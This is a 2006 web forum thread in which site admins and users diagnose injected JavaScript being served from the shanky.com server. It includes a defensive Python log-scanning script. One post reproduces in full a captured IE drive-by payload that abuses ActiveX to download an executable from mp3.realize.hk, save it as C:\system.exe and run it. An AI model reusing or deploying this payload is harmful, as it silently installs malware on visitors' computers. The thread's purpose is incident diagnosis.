Maverick

Age: 41, Joined: Feb 26 2005, Posts: 1521, Location: The Netherlands
Posted: Thu Oct 26, 2006 6:30 am, Post subject: shanky.com/server
What's going on?
The menus are gone, making the site impossible to navigate through.
K' You can win any war if you start a year early

Joined: Jul 13 2006, Posts: 271, Location: Southtown
Posted: Thu Oct 26, 2006 11:11 am
Everything seems to be in order for me.
Mine GO BOOM Hunch Hunch What What

Age: 42, Joined: Aug 01 2002, Posts: 3615, Location: Las Vegas
Posted: Thu Oct 26, 2006 11:49 am
It appears the host changed the default handler for server-side includes. If you view the source, you would have seen a bunch of include scripts. I just added AddHandler server-parsed .html to .htaccess and it works fine again.
When viewing the source of the page, I noticed that at the top of the index, before <title>, it had a javascript include of a file named biica.js, which does not exist anywhere on the site. Looking at the apache logs, there are 103 different such requests for random 5-letter javascript files, all returning 404 errors. Over the past couple of months, some people have mentioned that the shanky.com site has been flagging their antiviruses.
I take weekly backups of the shanky.com server, and nothing under my control is affected, at least that which I can control. Sent some logs to the host; hope they check the full machine. This is one of the big reasons why I enjoy having the full mineplowers.com machine (these forums are hosted on that machine) all to myself, every bit of software.
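As an added example (not code from this thread or from the shanky.com server), here is a Python script that checks for the two symptoms MGB describes above: 404s in the Apache access log for random five-letter .js names, and a script include ahead of <title> that points at a file the site does not actually serve. The log lines, page source and file list are constructed samples; the regexes and function names are my own assumptions.

```python
import re
from collections import Counter

# Constructed sample Apache combined-log lines (not the thread's real logs).
SAMPLE_LOG = """\
203.0.113.5 - - [26/Oct/2006:06:12:01 -0500] "GET /index.html HTTP/1.1" 200 5120 "-" "MSIE 6.0"
203.0.113.5 - - [26/Oct/2006:06:12:02 -0500] "GET /biica.js HTTP/1.1" 404 289 "http://example.test/index.html" "MSIE 6.0"
198.51.100.7 - - [26/Oct/2006:06:15:40 -0500] "GET /qzxmt.js HTTP/1.1" 404 289 "http://example.test/" "Firefox"
198.51.100.7 - - [26/Oct/2006:06:15:41 -0500] "GET /js/menu.js HTTP/1.1" 200 1842 "http://example.test/" "Firefox"
192.0.2.9 - - [26/Oct/2006:06:20:13 -0500] "GET /wpkdl.js HTTP/1.1" 404 289 "http://example.test/index.html" "MSIE 6.0"
"""

# Constructed page source showing the symptom: a script include before <title>.
SAMPLE_HTML = '<html><head><script src="biica.js"></script><script src="js/menu.js"></script><title>x</title></head></html>'
# Assumed list of files the site really has on disk (constructed).
KNOWN_FILES = {"index.html", "js/menu.js"}

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
RANDOM_JS_RE = re.compile(r'^/[a-z]{5}\.js$')  # e.g. /biica.js at the site root
SCRIPT_SRC_RE = re.compile(r'<script[^>]+src=["\']?([^"\'\s>]+)', re.I)

def parse_line(line):
    """Parse one combined-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_random_js_404s(log_text):
    """Requests matching the thread's symptom: 404s for random 5-letter .js names at the site root."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["status"] == "404" and RANDOM_JS_RE.match(rec["path"]):
            hits.append(rec)
    return hits

def summarize(hits):
    """How many suspicious requests, how many distinct names, and which clients were served the injected tag."""
    return {"count": len(hits),
            "distinct_names": len({h["path"] for h in hits}),
            "clients": Counter(h["ip"] for h in hits)}

def injected_scripts(html, known_files):
    """Script src values that appear before <title> and do not correspond to any real file on the site."""
    head = html.split("<title>", 1)[0]
    return [src for src in SCRIPT_SRC_RE.findall(head) if src.lstrip("/") not in known_files]

if __name__ == "__main__":
    print(summarize(find_random_js_404s(SAMPLE_LOG)))
    print(injected_scripts(SAMPLE_HTML, KNOWN_FILES))
```

Because the injected tag is not in any file on disk, the log check is the one that still works when the page source looks clean at the moment you inspect it.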
Solo Ace Yeah, I'm in touch with reality...we correspond from time to time.

Age: 38, Joined: Feb 06 2004, Posts: 2583, Location: The Netherlands
Posted: Thu Oct 26, 2006 3:45 pm
Funny how this is what I get:
<html>
<body>
<script language="javascript">
function CreateO(o, n) {
var r = null;
try { eval('r = o.CreateObject(n)') }catch(e){}
if (! r) {
try { eval('r = o.CreateObject(n, "")') }catch(e){}
}
if (! r) {
try { eval('r = o.CreateObject(n, "", "")') }catch(e){}
}
if (! r) {
try { eval('r = o.GetObject("", n)') }catch(e){}
}
if (! r) {
try { eval('r = o.GetObject(n, "")') }catch(e){}
}
if (! r) {
try { eval('r = o.GetObject(n)') }catch(e){}
}
return(r);
}
function Go(a) {
var obj_msxml2 = CreateO(a,"msxml2.XMLHTTP");
obj_msxml2.open("GET","http://mp3.realize.hk/store/index.php?reg=",false);
obj_msxml2.send();
var obj_adodb = CreateO(a,"adodb.stream");
obj_adodb.type = 1;
obj_adodb.open();
obj_adodb.Write(obj_msxml2.responseBody);
var fn = "C:\\system.exe";
obj_adodb.SaveToFile(fn,2);
var s = CreateO(a, "Shell.Application");
s.ShellExecute(fn);
return TRUE;
}
var i = 0;
var t = new Array(
'{BD96C556-65A3-11D0-983A-00C04FC29E30}',
'{BD96C556-65A3-11D0-983A-00C04FC29E36}',
'{AB9BCEDD-EC7E-47E1-9322-D4A210617116}',
'{0006F033-0000-0000-C000-000000000046}',
'{0006F03A-0000-0000-C000-000000000046}',
'{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}',
'{6414512B-B978-451D-A0D8-FCFDF33E833C}',
'{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}',
'{06723E09-F4C2-43c8-8358-09FCD1DB0766}',
'{639F725F-1B2D-4831-A9FD-874847682010}',
'{BA018599-1DB3-44f9-83B4-461454C84BF8}',
'{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}',
'{E8CCCDDF-CA28-496b-B050-6C07C962476B}',null);
while (t[i]) {
var a = null;
if (t[i].substring(0,1) == '{') {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
} else {
try { a = new ActiveXObject(t[i]); } catch(e){}
}
if (a) {
try {
var b = CreateO(a, "Shell.Application");
if (b) {
if (Go(a)) break;
}
}catch(e){}
}
i++;
}
</script>
</body>
</html>
Maverick

Age: 41, Joined: Feb 26 2005, Posts: 1521, Location: The Netherlands
Posted: Thu Oct 26, 2006 4:09 pm
I doubt there are virus scripts at shanky's site linking to mp3.realize.hk
What does that do anyway?
Hmm..
It starts some activeX objects, downloads a program, stores it to C:\system.exe and executes it?
BDwinsAlt Agurus's Posse

Age: 34, Joined: Jun 16 2003, Posts: 1145, Location: Alabama
Posted: Thu Oct 26, 2006 5:27 pm
I have 3 friends who say Norton detected a virus, but when I go to the site (I use Firefox) AntiVir doesn't detect any viruses. I run virus scans at night while I'm asleep and they don't detect any viruses, and I run spyware scans after only going to shanky and there is no spyware.
I think someone is manipulating MGB's site.
Btw: What did you use to make your flash site? I like it.
Doc Flabby Server Help Squatter

Joined: Feb 26 2006, Posts: 636
Posted: Thu Oct 26, 2006 7:39 pm
The virus will only work in IE.
Firefox doesn't have ActiveX.
The code downloads an exe disguised as an mp3 from mp3.realize.hk.
I saw Firefox make a connection to a weird site, but I can't get it to repeat the behavior; AntiVir did, however, detect a malicious javascript...
I have a theory that the counter that is used has been hacked, and that is where the exploit script came from, not the MGB server.
Mine GO BOOM Hunch Hunch What What

Age: 42, Joined: Aug 01 2002, Posts: 3615, Location: Las Vegas
Posted: Thu Oct 26, 2006 7:54 pm
It went back 'down' because my brother changed the main folder's .htaccess to parse all index.html files as php scripts. Renamed his specific file and removed the crappy htaccess, and it works fine again.
Yanked the counter code, since it didn't really record anything for the last couple of years, when they last got bought out. But the host got back to me:
Woolnet.net wrote:
> Hi,
> I can move your account(s) to another server. Would you be interested in that?
> This isn't a problem that will be easy to solve. It seems to be a security issue. Someone found an exploit in apache to inject into its memory to serve the .js files most probably. The strange thing is we aren't even able to reproduce the problem, which will make it even more difficult.
> We are planning to migrate all accounts soon anyway to a new server/OS with better security, reliability (RAID 1), and performance (Dual Opterons).
> Moving your account now will help solve this problem sooner for you.
> Derek Ting
> General Manager
> WoolNet - Hosting that you can count on
> Tel: 1-519-590-2221
Solo Ace Yeah, I'm in touch with reality...we correspond from time to time.

Age: 38, Joined: Feb 06 2004, Posts: 2583, Location: The Netherlands
Posted: Fri Oct 27, 2006 6:39 am
How is this possible? Lame.
And Mav, if that page wasn't there, why did the server send it to my browser?
BDwinsAlt Agurus's Posse

Age: 34, Joined: Jun 16 2003, Posts: 1145, Location: Alabama
Posted: Fri Oct 27, 2006 7:55 am
I have to agree with solo on this one.
Mine GO BOOM Hunch Hunch What What

Age: 42, Joined: Aug 01 2002, Posts: 3615, Location: Las Vegas
Posted: Fri Oct 27, 2006 4:28 pm
Solo Ace wrote:
> And Mav, if that page wasn't there, why did the server send it to my browser?
Is that what you really get? Got a timestamp when it happened? If so, I can scan the system's memory and see if anything in there has a copy of that, if it isn't in a file.
Confess Zone Hoster
Joined: Feb 10 2004, Posts: 532
Posted: Fri Oct 27, 2006 10:31 pm
I remember seeing somewhere on shanky.com that the website was sending out viruses and crap.
Solo Ace Yeah, I'm in touch with reality...we correspond from time to time.

Age: 38, Joined: Feb 06 2004, Posts: 2583, Location: The Netherlands
Posted: Sat Oct 28, 2006 2:18 pm
Sorry, usually everything's being logged here, but uh, just not at the moment.
I posted right after it happened to me, and yes I'm sure that was what I got.
K' You can win any war if you start a year early

Joined: Jul 13 2006, Posts: 271, Location: Southtown
Posted: Sat Oct 28, 2006 6:13 pm
Since I didn't have a problem with the page at any time, I say that it's either Maverick's PC full of viruses or that his browser reeks.
Next topic.
P.S.
Woolnet has some cool CS guys.
And VPS starting at $30 looks good and cheap, too.
Maverick

Age: 41, Joined: Feb 26 2005, Posts: 1521, Location: The Netherlands
Posted: Sun Oct 29, 2006 1:13 pm
K, your conclusion is totally flawed, making me believe you didn't read anything of this topic at all.
Go do something useful for a change and mind your own business.
Mine GO BOOM Hunch Hunch What What

Age: 42, Joined: Aug 01 2002, Posts: 3615, Location: Las Vegas
Posted: Thu Nov 02, 2006 1:19 pm
Shanky.com, etc have moved from server2a.woolnet.net to server3a.woolnet.net. If anyone gets anything stupid happen to them again, let me know.